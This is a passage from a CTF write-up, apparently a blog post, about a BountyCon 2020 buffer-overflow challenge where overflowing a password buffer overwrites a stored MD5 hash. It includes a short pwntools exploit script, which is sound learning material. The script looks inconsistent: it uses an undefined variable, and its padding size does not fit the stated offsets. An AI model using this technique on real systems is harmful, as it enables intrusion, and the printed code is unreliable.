BountyCon 2020

The BountyCon2020 CTF is sponsored by Facebook and top 20 people from APAC region will be invited to the invitation-only conference in Singapore.

I solved all the challenges in the CTF and I really enjoyed playing it, and I am invited to the Conference.

Its an easy binary exploitation challenge, binary asks for the password and the comparison is like md5(password) == "hash". We can't crack the hash, though you can find collisions for md5 with reasonable time. There is a buffer overflow in the password buffer and hash is consecutive to the password buffer, for example password buffer is at rbp-0x58 and hash is at rbp-0x30, as there is an overflow in password buffer we can overflow the hash.

Exploit

from pwn import *

from hashlib import md5

p = remote("localhost",10000)

# p = remote("ec2-3-11-37-224.eu-west-2.compute.amazonaws.com",10000)

payload = 'a'*0x81 + md5(dat).digest() 

p.sendafter("Password: ",payload)

p.interactive()

I expected few more binary exploitation challenges, but this is the only challenge given

Its